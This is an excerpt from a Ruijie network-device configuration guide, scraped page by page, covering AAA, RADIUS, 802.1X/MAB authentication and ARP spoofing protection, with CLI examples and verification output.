  • Page 727 Configuration Guide Configuring AAA  EXEC accounting Accounting is performed when users log in to and out of the CLI of the NAS.  Command accounting Records are kept on the commands that users run on the CLI of the NAS. ...
  • Page 728 Configuration Guide Configuring AAA  Searches for the user domain according to the domain name.  Searches for the corresponding AAA method list name according to the domain configuration information on the NAS.  Searches for the corresponding method list according to the method list name. ...
  • Page 729 Configuration Guide Configuring AAA To display domain configuration, run the show aaa domain command. The system supports a maximum of 32 domains. 2.4 Configuration Configuration Description and Command Mandatory if user identities need to be verified. aaa new-model Enables AAA. aaa authentication login Defines a method list of login authentication.
  • Page 730 Configuration Guide Configuring AAA Configuration Description and Command aaa accounting network Defines a method list of network accounting. accounting exec Applies EXEC accounting methods to a specified VTY line. accounting commands Applies command accounting methods to a specified VTY line. Enables accounting update.
  • Page 731 Configuration Guide Configuring AAA  If an authentication scheme contains multiple authentication methods, these methods are executed according to the configured sequence.  The next authentication method is executed only when the current method does not respond. If the current method fails, the next method will be not tried.
  • Page 732 Configuration Guide Configuring AAA  This configuration is mandatory if you need to configure an Enable authentication method list. (You can configure only the default method list.)  By default, no method list of Enable authentication is configured.  Defining a Method List of 802.1X Authentication ...
  • Page 733 Enabling Local Account (username or subs) Sharing in Web and iPortal Authentication  (Optional) This configuration is supported only on EG products. This function is supported by default on other types of Ruijie products.  By default, a local account cannot be shared among multiple STAs.
  • Page 734 Configuration Guide Configuring AAA negotiation through AAA. Run the aaa authentication login command to configure the default or optional method lists for login authentication. In a method list, the next method is executed only when the current method does not receive response. After you configure login authentication methods, apply the methods to the VTY lines that require login authentication;...
  • Page 735 Configuration Guide Configuring AAA  Defining a Method List of PPP, Web, iPortal or SSL VPN Authentication Command aaa authentication { ppp | web-auth | iportal | sslvpn } { default | list-name } method1 [ method2...] Parameter ppp: Configures a method list of PPP authentication. Description web-auth: Configures a method list of Web authentication.

  • Page 736: Scenario

    Ruijie#configure terminal Ruijie(config)#username user password pass Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key ruijie Ruijie(config)#aaa authentication login list1 group radius local Ruijie(config)#line vty 0 20 Ruijie(config-line)#login authentication list1 Ruijie(config-line)#exit Verification Run the show aaa method-list command on the NAS to display the configuration.

  • Page 737: Scenario

    You can define only one Enable authentication method list globally. You do not need to define the list name but just default it. After that, it will be applied automatically. Ruijie#configure terminal Ruijie(config)#username user privilege 15 password pass Ruijie(config)#enable secret w...

  • Page 738: Scenario

    Configuration Guide Configuring AAA Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key ruijie Ruijie(config)#aaa authentication enable default group radius local enable Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list: aaa authentication enable default group radius local enable...
  • Page 739 Ruijie(config)#username user1 password pass1 Ruijie(config)#username user2 password pass2 Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key ruijie Ruijie(config)#aaa authentication dot1x default group radius local Ruijie(config)#interface gigabitEthernet 0/1 Ruijie(config-if-gigabitEthernet 0/1)#dot1 port-control auto Ruijie(config-if-gigabitEthernet 0/1)#exit Verification Run the show aaa method-list command on the NAS to display the configuration.
  • Page 740 Configuration Guide Configuring AAA  EXEC authorization is often used with login authentication, which can be implemented on the same line. Authorization and authentication can be performed using different methods and servers. Therefore, the results of the same user may be different.
  • Page 741 Configuration Guide Configuring AAA  Applying EXEC Authorization Methods to a Specified VTY Line  Run the authorization exec command in line configuration mode to apply EXEC authorization methods to a specified VTY line.  This configuration is mandatory if you need to apply an EXEC authorization method list to a specified VTY line. ...
  • Page 742 Configuration Guide Configuring AAA method: Specifies authentication methods from local, none, and group. A method list contains up to four methods. local: Indicates that the local user database is used for EXEC authorization. none: Indicates that EXEC authorization is not performed. group: Indicates that a server group is used for EXEC authorization.
  • Page 743 Configuration Guide Configuring AAA TACACS+ server groups are supported. Command Global configuration mode Mode The RGOS supports authorization of network-related service requests such as PPP and SLIP requests. Usage Guide After authorization is configured, all authenticated users or interfaces are authorized automatically. You can configure three different authorization methods.

  • Page 744: Scenario

    Ruijie(config)#username user password pass Ruijie(config)#username user privilege 6 Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication login list1 group local Ruijie(config)#aaa authorization exec list2 group radius local Ruijie(config)#line vty 0 4 Ruijie(config-line)#login authentication list1 Ruijie(config-line)# authorization exec list2 Ruijie(config-line)#exit Verification Run the show run and show aaa method-list commands on the NAS to display the configuration.

  • Page 745: Scenario

    Configuration Guide Configuring AAA Authorization method-list: aaa authorization exec list2 group radius local Ruijie# show running-config aaa new-model aaa authorization exec list2 group local aaa authentication login list1 group radius local username user password pass username user privilege 6 radius-server host 10.1.1.1...
  • Page 746 Ruijie(config)#aaa new-model Ruijie(config)#tacacs-server host 192.168.217.10 Ruijie(config)#tacacs-server key aaa Ruijie(config)#aaa authentication login default local Ruijie(config)#aaa authorization commands 15 default group tacacs+ local Ruijie(config)#aaa authorization console Verification Run the show run and show aaa method-list commands on the NAS to display the configuration.

  • Page 747: Scenario

    Step 3: Configure an AAA authorization method list according to different access modes and service types. Step 4: Apply the configured method list to an interface or line. Skip this step if the default authorization method is used. Ruijie#configure terminal Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test...
  • Page 748 Configuration Guide Configuring AAA Ruijie(config)#aaa authorization network default group radius none Ruijie(config)# end Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list: Accounting method-list: Authorization method-list: aaa authorization network default group radius none Common Errors 2.4.3 Configuring AAA Accounting...
  • Page 749 Configuration Guide Configuring AAA Command accounting  Only the TACACS+ protocol supports command accounting. Configuration Steps  Enabling AAA  Mandatory.  Run the aaa new-model command to enable AAA.  By default, AAA is disabled.  Defining a Method List of EXEC Accounting ...
  • Page 750 Configuration Guide Configuring AAA  Applying Command Accounting Methods to a Specified VTY Line  Run the accounting commands command in line configuration mode to apply command accounting methods to a specified VTY line.  This configuration is mandatory if you need to apply a command accounting method list to a specified VTY line. ...
  • Page 751 Configuration Guide Configuring AAA Parameter default: With this parameter used, the configured method list will be defaulted. Description list-name: Indicates the name of an EXEC accounting method list in characters. method: Indicates authentication methods from none and group. A method list contains up to four methods. none: Indicates that EXEC accounting is not performed.
  • Page 752 Configuration Guide Configuring AAA Description list-name: Indicates the name of a network accounting method list in characters. start-stop: Indicates that a start-accounting message and a stop-accounting message are sent when a user accesses a network and when the user disconnects from the network respectively. The start-accounting message indicates that the user is allowed to access the network, regardless of whether accounting is successfully enabled.

  • Page 753: Scenario

    Ruijie#configure terminal Ruijie(config)#username user password pass Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication login list1 group local Ruijie(config)#aaa accounting exec list3 start-stop group radius Ruijie(config)#line vty 0 4 Ruijie(config-line)#login authentication list1 Ruijie(config-line)# accounting exec list3 Ruijie(config-line)#exit Verification Run the show run and show aaa method-list commands on the NAS to display the configuration.

  • Page 754: Scenario

    Step 2: Configure an AAA accounting method list according to different access modes and service types. Step 3: Apply the configured method list to an interface or line. Skip this step if the default accounting method is used. Ruijie#configure terminal Ruijie(config)#username user1 password pass1...
  • Page 755 Ruijie(config)#aaa new-model Ruijie(config)#tacacs-server host 192.168.217.10 Ruijie(config)#tacacs-server key aaa Ruijie(config)#aaa authentication login default local Ruijie(config)#aaa accounting commands 15 default start-stop group tacacs+ Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list:...

  • Page 756: Scenario

    Step 4: Apply the configured AAA accounting method list. Skip this step if the default accounting method is used. Accounting is performed only when 802.1X authentication is completed. Ruijie#configure terminal Ruijie(config)#username user password pass Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication dot1x aut1x group radius local Ruijie(config)#aaa accounting network acc1x start-stop group radius...
  • Page 757 Configuration Guide Configuring AAA Ruijie(config)#dot1x authentication aut1x Ruijie(config)#dot1x accounting acc1x Ruijie(config)#interface gigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#dot1 port-control auto Ruijie(config-if-GigabitEthernet 0/1)#exit Verification Run the show aaa method-list command on the NAS to display the configuration. Ruijie#show aaa method-list Authentication method-list: aaa authentication dot1x aut1x group radius local...
  • Page 758 Configuration Guide Configuring AAA  Mandatory.  Run the server command to add AAA server group members.  By default, a user-defined server group does not have servers.  Configuring the VRF Attribute of an AAA Server Group  Optional. ...

  • Page 759: Scenario

    Step 2: Create user-defined AAA server groups. Steps Step 3: Add servers to the AAA server groups. Ruijie#configure terminal Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server host 10.1.1.2 Ruijie(config)#radius-server host 10.1.1.3 Ruijie(config)#radius-server host 10.1.1.4 Ruijie(config)#radius-server key secret Ruijie(config)#aaa group server radius g1 Ruijie(config-gs-radius)#server 10.1.1.1 Ruijie(config-gs-radius)#server 10.1.1.2...
  • Page 760 Configuration Guide Configuring AAA Ruijie(config-gs-radius)#exit Ruijie(config)#aaa group server radius g2 Ruijie(config-gs-radius)#server 10.1.1.3 Ruijie(config-gs-radius)#server 10.1.1.4 Ruijie(config-gs-radius)#exit Verification Run the show aaa group and show run commands on the NAS to display the configuration. Ruijie#show aaa group Type Reference Name ---------- ---------- ----------...
  • Page 761 Configuration Guide Configuring AAA Common Errors  For RADIUS servers that use non-default authentication and accounting ports, when you run the server command to add servers, specify the authentication or accounting port.  Only the RADIUS server group can be configured with the VRF attribute. 2.4.5 Configuring the Domain-Based AAA Service Configuration Effect Create AAA schemes for 802.1X users in different domains.
  • Page 762 Configuration Guide Configuring AAA  Mandatory.  Run the aaa new-model command to enable AAA.  By default, AAA is disabled.  Enabling the Domain-Based AAA Service  Mandatory.  Run the aaa domain enable command to enable the domain-based AAA service. ...
  • Page 763 Configuration Guide Configuring AAA  Configuring Whether to Contain the Domain Name in Usernames  Optional.  By default, the usernames exchanged between the NAS and an authentication server carry domain information.  Configuring the Maximum Number of Domain Users ...
  • Page 764 Configuration Guide Configuring AAA configured domain name, the NAS uses the method list associated with this domain to provide the AAA service to the user. The system supports a maximum of 32 domains.  Associating the Domain with an 802.1X Authentication Method List Command authentication dot1x { default | list-name } Parameter...

  • Page 765: Scenario

    Step 5: Associate the domain with the AAA method list. Step 6: Configure the domain attribute. Ruijie#configure terminal Ruijie(config)#aaa new-model Ruijie(config)#radius-server host 10.1.1.1 Ruijie(config)#radius-server key test Ruijie(config)#aaa authentication dot1x default group radius Ruijie(config)#aaa accounting network list3 start-stop group radius Ruijie(config)# aaa domain enable...
  • Page 766 Configuration Guide Configuring AAA Ruijie(config)# aaa domain domain.com Ruijie(config-aaa-domain)# authentication dot1x default Ruijie(config-aaa-domain)# accounting network list3 Ruijie(config-aaa-domain)# username-format without-domain Verification Run the show run and show aaa domain command on the NAS to display the configuration. Ruijie#show aaa domain domain.com =============Domain domain.com=============...
  • Page 767 Configuration Guide Configuring AAA aaa accounting network list3 start-stop group radius aaa authentication dot1x default group radius nfpp no service password-encryption radius-server host 10.1.1.1 radius-server key test line con 0 line vty 0 4 Common Errors 2.5 Monitoring Clearing Description Command Clears the locked users.

  • Page 768: Configuring Radius

    Configuration Guide Configuring RADIUS 3 Configuring RADIUS 3.1 Overview The Remote Authentication Dial-In User Service (RADIUS) is a distributed client/server system. RADIUS works with the Authentication, Authorization, and Accounting (AAA) to conduct identity authentication on users who attempt to access a network, to prevent unauthorized access. In RGOS implementation, a RADIUS client runs on a device or Network Access Server (NAS) and transmits identity authentication requests to the central RADIOUS server, where all user identity authentication information and network service information are stored.

  • Page 769: Scenario

    Configuration Guide Configuring RADIUS Application Description Authorization, and Accounting network, to prevent unauthorized access or operations. Services for Access Users Forcing Users to Go Offline The server forces an authenticated user to go offline. 3.2.1 Providing Authentication, Authorization, and Accounting Services for Access Users Scenario RADIUS is typically applied in the authentication, authorization, and accounting of access users.
  • Page 770 Configuration Guide Configuring RADIUS See Figure 3-1 for the networking topology. Deployment  Add the following deployment on the basis of 1.2.1 "Deployment".  Enable the RADIUS dynamic authorization extension function on the RADIUS client. 3.3 Features Basic Concepts  Client/Server Mode ...
  • Page 771 Configuration Guide Configuring RADIUS  Length: Identifies the length of a whole RADIUS packet, which includes Code, Identifier, Length, Authenticator, and Attributes. It occupies two bytes. Bytes that are beyond the Length field will be truncated. If the length of a received packet is smaller than the value of Length, the packet is discarded.
  • Page 772 Configuration Guide Configuring RADIUS Attribute No. Attribute Name Attribute No. Attribute Name Calling-Station-Id Prompt NAS-Identifier Connect-Info Proxy-State Configuration-Token Login-LAT-Service EAP-Message Login-LAT-Node Message-Authenticator Login-LAT-Group Tunnel-Private-Group-id Framed-AppleTalk-Link Tunnel-Assignment-id Framed-AppleTalk-Network Tunnel-Preference Framed-AppleTalk-Zone ARAP-Challenge-Response Acct-Status-Type Acct-Interim-Interval Acct-Delay-Time Acct-Tunnel-Packets-Lost Acct-Input-Octets NAS-Port-Id  Shared Key A RADIUS client and a RADIUS server mutually confirm their identities by using a shared key during communication. The shared key cannot be transmitted over a network.
  • Page 773 RADIUS protocol to implement private functions or functions that are not defined in the standard RADIUS protocol. Table 1-3 lists private attributes supported by Ruijie products. The TYPE column indicates the default configuration of private attributes of Ruijie products and the Extended TYPE column indicates the default configuration of private attributes of other non-Ruijie products.
  • Page 774 Configuration Guide Configuring RADIUS Function TYPE Extended TYPE ipv6-multicast-address ipv4-multicast-address sdg-type sdg-zone-name sdg-group-name Overview Feature Description RADIUS Authentication, Conducts identity authentication and accounting on access users, safeguards network Authorization, and Accounting security, and facilitates management for network administrators. Source Address of RADIUS Specifies the source IP address used by a RADIUS client to transmit packets to a RADIUS Packets server.
  • Page 775 Configuration Guide Configuring RADIUS Figure 3-3 The RADIUS authentication and authorization process is described as follows: A user enters the user name and password and transmits them to the RADIUS client. After receiving the user name and password, the RADIUS client transmits an authentication request packet to the RADIUS server.
  • Page 776 Configuration Guide Configuring RADIUS Related Configuration  Configuring RADIUS Server Parameters No RADIUS server is configured by default. You can run the radius-server host command to configure a RADIUS server. At least one RADIUS server must be configured so that RADIUS services run normally. ...
  • Page 777 Configuration Guide Configuring RADIUS Run the ip radius source-interface command to specify the source interface for transmitting RADIUS packets. The device uses the first IP address of the specified interface as the source address of RADIUS packets. 3.3.3 RADIUS Timeout Retransmission Working Principle After a RADIUS client transmits a packet to a RADIUS server, a timer is started to detect the response of the RADIUS server.
  • Page 778 Configuration Guide Configuring RADIUS You can run the radius-server dead-criteria command to configure the criteria for the device to judge that the RADIUS security server is unreachable.  Configuring the Test User Name for Actively Detecting the RADIUS Security Server No test user name is specified for actively detecting the RADIUS security server by default.
  • Page 779 Configuration Guide Configuring RADIUS Configuration Description and Command ip radius source-interface Configures the source address of RADIUS packets. (Optional) It is used to define attribute processing adopted when the device encapsulates and parses RADIUS packets. Configures the MAC address format of RADIUS radius-serverattribute31 attribute No.
  • Page 780 In an 802.1X authentication environment that uses the RADIUS security protocol, if a network device serves as the 802.1X authenticator and Ruijie SU is used as the 802.1X client software, it is recommended that radius-server timeout be set to 3 seconds (the default value is 5 seconds) and radius-server retransmit be set to 2 (the default value is 3) on the network device.
  • Page 781 Configuration Guide Configuring RADIUS Related Commands  Configuring the Remote RADIUS Security Server Command radius-server host ipv4-address ipv6-address} [auth-portport-number] [acct-portport-number][ test usernamename [ idle-timetime ] [ ignore-auth-port ] [ ignore-acct-port ] ] [ key [ 0 | 7 ] text-string ] Parameter oob: Indicates oob authentication, that is, the source interface for transmitting packets to the RADIUS server Description...
  • Page 782 Configuration Guide Configuring RADIUS The same shared key must be configured on the device and RADIUS security server so that they can communicate with each other successfully.  Configuring the Request Transmission Count, After Which the Device Confirms That a RADIUS Server Is Unreachable Command radius-server retransmitretries...

  • Page 783: Scenario

    Ruijie (config)#aaa new-model Ruijie (config)# radius-server host 192.168.5.22 Ruijie (config)#radius-server host 3000::100 Ruijie (config)# radius-server key aaa Ruijie (config)#aaa authentication login test group radius Ruijie (config)#aaa authorizationexectest group radius Ruijie (config)#aaa accountingexectest start-stop group radius Ruijie (config)# line vty 0 4...
  • Page 784 3.4.2 Configuring the RADIUS Attribute Type Configuration Effect  Define the attribute processing adopted when the device encapsulates and parses RADIUS packets. Notes  Private attributes involved in "Configuring the RADIUS Attribute Type" refer to Ruijie private attributes. Configuration Steps...
  • Page 785 Enable the device to interact with the RADIUS server. Conduct packet capture to display the MAC address format of Calling-Station-Id.  Enable the device to interact with the RADIUS server. Display the debug information of the device to check that Ruijie private attributes are correctly parsed by the device.
  • Page 786 Configuration Guide Configuring RADIUS  Enable the device to interact with the RADIUS server. Display the debug information of the device to check that the CUI attribute is correctly parsed by the device. Related Commands  Configuring the MAC Address Format of RADIUS Attribute No. 31 (Calling-Station-ID) Command radius-server attribute 31 mac format {ietf | normal | unformatted } Parameter...

  • Page 787: Scenario

    Configuration Guide Configuring RADIUS Parameter Description Global configuration mode Command Mode Configure this command to use the issued QoS value as the CoS value. The QoS value is used as the Usage Guide DSCP value by default.  Configures the Device to Support the CUI Attribute Command radius support cui Parameter...
  • Page 788 Ruijie(config)#radius attribute 16 vendor-type 211 Ruijie(config)#radiussetqoscos Ruijie(config)#radiussupport cui Ruijie(config)#radiusvendor-specific extend Ruijie(config)# no radius vendor-specific attribute support cisco Verification Conduct packet capture or display debug information of the device to check whether the RADIUS standard attributes and private attributes are encapsulated/parsed correctly.
  • Page 789 Configuration Guide Configuring RADIUS  After the previous correct response is received from the RADIUS server, the count that the device transmits requests to the RADIUS server but fails to receive correct responses (including retransmission) reaches the value set in radius-server dead-criteria triesnumber.

  • Page 790: Scenario

    RADIUS Ruijie(config)#radius-server dead-criteria time120 tries 5 Client Ruijie(config)# radius-server host 192.168.5.22 test username test ignore-acct-port idle-time 90 Verification Disconnect the network communication between the device and the server with the IP address of 192.168.5.22.Conduct RADIUS authentication through the device. After 120 seconds, run the show radius...
  • Page 791 Configuration Guide Configuring RADIUS Ruijie#show running-config … radius-server host 192.168.5.22 test username test ignore-acct-port idle-time 90 radius-server dead-criteria time 120 tries 5 … 3.5 Monitoring Clearing Running the clear commands may lose vital information and thus interrupt services. Description Command...
  • Page 792 Configuration Guide Configuring RADIUS Description Command Debugs the RADIUS event. debugradiusevent Debugs RADIUS packet printing. debugradiusdetail Debugs RADIUS dynamic debug radiusextension event authorization extension function. Debugs RADIUS dynamic debug radius extension detail authorization extension packet printing.

  • Page 793: Scenario

    Wireless stations or devices (STAs) should pass 802.1X authentication to access the enterprise network. As shown in Figure 4-1:  STAs are installed with 802.1X clients (which can come with the operating system, or others like Ruijie Supplicant).
  • Page 794 Configure RADIUS parameters to ensure proper communication between the AC and the RADIUS server. For details, see the Configuring RDS.  If a Ruijie RADIUS server is used, configure SNMP parameters to allow the RADIUS server to manage devices, such as querying and setting. ...
  • Page 795 MAC address bypass (MAB) authentication means that the MAC address is used as the user name and password for authentication. Since Ruijie Supplicant cannot be installed on some dumb ends such as network printers, use MAB to perform security control.
  • Page 796 Configuration Guide Configuring 802.1X  RIPT Using Remote Intelligent Perceptive Technology (RIPT), an AP can continue to provide WLAN services to customers when the AC is faulty or disconnected from the AP. 802.1X supports this technology. 802.1X on such APs can continue to provide authentication service for customers.
  • Page 797 Configuration Guide Configuring 802.1X client support embedded in the operating system, Ruijie has launched a Ruijie Supplicant compliant with the 802.1X standard.  Authenticator The authenticator is usually an NAS such as a switch or wireless access hotspot. It controls the network connection of a client based on the client's authentication status.
  • Page 798 Authenticating User Status 802.1X determines whether a user on a port can access the network based on the authentication status of the port. Ruijie products extend the 802.1X and realizes access control based on users (identify a wired user by the MAC address) by default.
  • Page 799 Supplicant A user should start Ruijie Supplicant to enter the user name and initiate authentication. If the operating system brings an own authentication client and the network is available, a dialog box will be displayed, asking the user to enter the user name.
  • Page 800 Cisco-proprietary attributes. For details, see the software description related to the RADIUS server.  Kickoff Used with RG-SAM/SMP, Ruijie 802.1X server can kick off online users who will be disconnected with the network. This function applies to the environment where the maximum online period and real-time accounting check function are configured.
  • Page 801 Configuration Guide Configuring 802.1X  Accounting End After a user goes offline, the NAS sends the RADIUS server an accounting end packet carrying the online period and traffic of the user. The RADIUS server generates online records based on the information carried in this packet. 4.3.4 RIPT 802.1X-enabled STAs support RIPT.
  • Page 802 NAS and the RADIUS server. (Optional) It is used to configure 802.1X parameters. Ensure that the 802.1X server timeout is longer than the RADIUS server timeout. Online Ruijie client detection applies only to Ruijie Supplicant. Enables re-authentication. dot1x re-authentication dot1x timeout re-authperiod Configures the re-authentication interval.
  • Page 803 Configuration Guide Configuring 802.1X Configures the bypass WLAN for the dot1x event server-invalid action bypass-wlan RADIUS server. Configures 802.1X authentication dot1x encryption only encryption only when 802.1X and Web authentication are both enabled. Limits the rate of printing online and offline dot1x logging rate-limit logs.
  • Page 804 Configuration Guide Configuring 802.1X Configuration Steps  Enabling AAA  (Mandatory) 802.1X authentication and accounting take effect only after AAA is enabled.  Enable AAA on the NAS that needs to control user access by 802.1X. Command aaa new-model Parameter Description Defaults AAA is disabled by default.
  • Page 805 If 802.1X is enabled on a WLAN, only 802.11 management frames and EAP packets are allowed to pass.  For related commands, see the Configuring RSNA. Verification Start Ruijie Supplicant, enter the correct account information, and initiate authentication. Then check whether the 802.1X and RADIUS configurations are correct.  Checking for 802.1X Authentication Entries...

  • Page 806: Scenario

    Checking for AAA User Entries Command show aaa user all Parameter Description Command Privileged EXEC mode/Global configuration mode/Interface configuration mode Mode Usage Guide Display information of AAA users. Ruijie#show aaa user all Command ----------------------------- Display Id ----- Name 2345687901 wwxy -----------------------------  ...

  • Page 807: Scenario

     The user fails to ping 192.168.32.120 before authentication.  After the user enters account information and click Authenticate on Ruijie Supplicant, the authentication succeeds and the user can successfully ping 192.168.32.120.  Information of the authenticated user is displayed.
  • Page 808  The user fails to ping 192.168.32.120 before authentication.  After the user enters account information and click Authenticate on Ruijie Supplicant, the authentication succeeds and the user can successfully ping 192.168.32.120.  Information of the authenticated user is displayed.
  • Page 809 Configuration Guide Configuring 802.1X  Adjust 802.1X parameter configurations based on the actual network situation. For example, if the authentication server has poor performance, you can raise the authentication server timeout. Notes  802.1X and RADIUS have separate server timeouts. By default, the authentication server timeout of 802.1X is 5 seconds while that of RADIUS is 15 seconds.
  • Page 810 Configuration Guide Configuring 802.1X Parameter period: Indicates the interval of EAP-Request/Identity packet retransmission in the unit of seconds. Description The default value is 30 seconds. Defaults Global configuration mode Command Mode It is recommended to use the default value. Adjust the value based on how long the authentication client Usage Guide responds to the NAS's requests.
  • Page 811 Configuration Guide Configuring 802.1X Parameter num: Indicates the maximum times of EAP-Request/Challenge packet retransmission in the unit of seconds. Description The default value is 3. Defaults Global configuration mode Command Mode Optional. Usage Guide It is recommended to use the default value. Increase this value in the case of high-rate packet loss. ...

  • Page 812: Scenario

    Defaults The default value is eap. Global configuration mode Command Mode Select the authentication mode supported by Ruijie Supplicant and authentication server. Usage Guide Verification Run the show dot1x command to check whether parameter configurations take effect. Configuration Example ...
  • Page 813 Configuration Guide Configuring 802.1X Common Errors  The server timeout is shorter than the RADIUS timeout. 4.4.3 Configuring MAB Configuration Effect  On WLANs, WLAN-based MAB is supported. If MAB is enabled, the NAS automatically associates the MAC address of an STA on the WLAN as the user name and password to initiate authentication to the authentication server.

  • Page 814: Scenario

     NAS configurations are as follows. For detailed configuration on the RADIUS server, see the Configuring RADIUS. ruijie# configure terminal ruijie (config)# aaa new-model ruijie (config)# radius-server host 192.168.32.120 ruijie (config)# radius-server key ruijie ruijie(config)#wlansec 1 ruijie(config-wlansec)#dot1x-mab Verification Check whether authentication is proper and network access behaviors change after authentication.

  • Page 815: Scenario

     The user connects to the NAS, the authentication succeeds, and the user can successfully ping 192.168.32.120.  Information of the authenticated user is displayed. ruijie# show dot1x summary Username Interface VLAN Auth-State Backend-State Port-Status User-Type Time --------- ---------- -------------- --------- ---- --------------- ------------- ----------- --------- ------------------ 16778217 0023aea...

  • Page 816: Scenario

    The multi-account function must be disabled if accounting is enabled. Otherwise, accounting may be inaccurate.  IP-based accounting is not required in two situations: - IPv4 addresses and Ruijie Supplicant are deployed. This function is not required because Ruijie Supplicant can upload the IPv4 addresses of users. - Static IP addresses are deployed.
  • Page 817 Configuration Guide Configuring 802.1X Defaults Multi-account authentication is disabled by default. Command Global configuration mode Mode Configure this command when multi-account authentication is required in 802.1X authentication, e.g. in the Usage Guide case of Windows domain authentication. In this case, the authentication client can directly use a new account to initiate authentication while the previous account is still online.
  • Page 818 Configuration Guide Configuring 802.1X Command dot1x valid-ip-acct timeout time Parameter time: Indicates the timeout in the unit of minutes. Description The default value is 5 minutes. Defaults Global configuration mode Command Mode Usage Guide It is recommended to use the default value. Configure this command when there is a need to change the IP address obtaining timeout after users pass authentication.
  • Page 819 Configuration Guide Configuring 802.1X Parameter value: Indicates the syslog printing rate per second upon users going online/offline. The default value is 5 Description per second. 0 indicates no rate limit. The default value is 5 per second. Defaults Global configuration mode Command Mode Generally it is recommended to use the defaults.
  • Page 820 Configuration Guide Configuring 802.1X  (Optional) If this function is enabled, online users always use the accounting update interval assigned by the authentication server upon the first authentication, instead of the accounting update interval configured on the NAS. Command dot1x acct-update base-on first-time server Parameter Description Defaults...
  • Page 821 Configuration Guide Configuring 802.1X Displays the information of controlled show dot1x port-control ports. Displays the re-authentication status. show dot1x re-authentication Displays the maximum times of show dot1x reauth-max EAP-Request/Identity packet retransmission. Displays quiet period after show dot1x timeout quiet-period authentication fails. Displays re-authentication show dot1x timeout re-authperiod...
  • Page 822 Configuration Guide Configuring 802.1X Debugs 802.1X packets. debug dot1x packet Debugs 802.1X state machine debug dot1x stm (STM). Debugs 802.1X internal debug dot1x com communication. Debugs 802.1X errors. debug dot1x error...
  • Page 823 Configuration Guide Configuring ARP Check 5 Configuring ARP Check 5.1 Overview The Address Resolution Protocol (ARP) packet check filters all ARP packets under ports (including wired layer-2 switching ports, layer-2 aggregate ports (APs), and layer-2 encapsulation sub-interfaces, as well as WLAN interfaces) and discards illegal ARP packets, so as to effectively prevent ARP deception via networks and to promote network stability.

  • Page 824: Scenario

    Configuration Guide Configuring ARP Check 5.2.1 Filtering ARP Packets in Networks Scenario Check ARP packets from distrusted ports and filter out ARP packets with addresses not matching the results assigned by the DHCP server. For example, in the following figure, the ARP packets sent by DHCP clients are checked. ...
  • Page 825 Configuration Guide Configuring ARP Check The ARP Check has two modes: Enabled and Disabled. The default is Enabled. 17. Enabled Mode Through ARP Check, ARP packets are detected based on the IP/IP-MAC based binding information provided by the following modules. ...
  • Page 826 Configuration Guide Configuring ARP Check 5.4 Configuration Configuration Description and Command (Mandatory) It is used to enable APR Check. Configuring ARP Check Enables ARP Check. arp-check 5.4.1 Configuring ARP Check Configuration Effect  Illegal ARP packets are filtered out. Notes ...
  • Page 827 Configuration Guide Configuring ARP Check Usage Guide Generate ARP filtration information according to the legal user information of security application modules to filter out illegal ARP packets in networks. Configuration Example The following configuration example introduces only ARP Check related configurations. ...
  • Page 828 Configuration Guide Configuring ARP Check Ruijie# configure terminal Ruijie(config)#address-bind 192.168.1.3 00D0.F800.0003 Ruijie(config)#address-bind install Ruijie(config)#ip source binding 00D0.F800.0002 vlan 1 192.168.1.4 interface gigabitEthernet 0/1 Ruijie(config)# interface GigabitEthernet 0/1 Ruijie(config-if-GigabitEthernet 0/1)#arp-check Ruijie(config-if-GigabitEthernet 0/1)#ip verify source port-security Ruijie(config-if-GigabitEthernet 0/1)#switchport port-security Ruijie(config-if-GigabitEthernet 0/1)#switchport port-security binding 00D0.F800.0001 vlan 1 192.168.1.1...
  • Page 829 Configuration Guide Configuring ARP Check Verification Use the show interface arp-check list command to display the effective ARP Check list for interfaces. Ruijie# show interface arp-check list INTERFACE SENDER MAC SENDER IP POLICY SOURCE ------------------------ -------------------- -------------------- -------------------- GigabitEthernet 0/1 00d0.f800.0003...

  • Page 830: Scenario

    Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention 6 Configuring Gateway-targeted ARP Spoofing Prevention 6.1 Overview Gateway-targeted Address Resolution Protocol (ARP) spoofing prevention effectively prevents gateway-targeted ARP spoofing by checking on the logical port whether the source IP addresses of ARP packets (Sender IP fields of ARP packets) are the self-configured gateway IP addresses.
  • Page 831 Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention Deployment  On the access switch (Switch A), enable gateway-targeted spoofing prevention on the ports (Gi 0/3 and Gi 0/4 in this case) directly connected to the PC. The gateway addresses include intranet gateway address and intranet server address.
  • Page 832 Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention from User A to the gateway during communication will be sent to User B. In this way, User A's communications are intercepted, thereby causing ARP spoofing. Overview Feature Description #_Gateway-targete Blocks ARP spoofing packets with forged gateway address and intranet server IP addresses to Spoofing ensure that users can access the Internet.
  • Page 833 Configuration Guide Configuring Gateway-targeted ARP Spoofing Prevention  Configuring Gateway-targeted Spoofing Prevention  Gateway-targeted ARP spoofing prevention is mandatory. It must be enabled. Verification  Run the show run command to check configuration.  Run the show anti-arp-spoofing command to display all data on gateway-targeted ARP spoofing prevention. Related Commands ...

  • Page 834: Scenario

    Configuration Guide Configuring Global IP-MAC Binding 7 Configuring Global IP-MAC Binding 7.1 Overview Enable the global IP-MAC binding function manually to verify the input packets. If a specified IP address is bound with a MAC address, the device receives only the IP packets containing matched IP address and MAC address. The other packets are discarded.
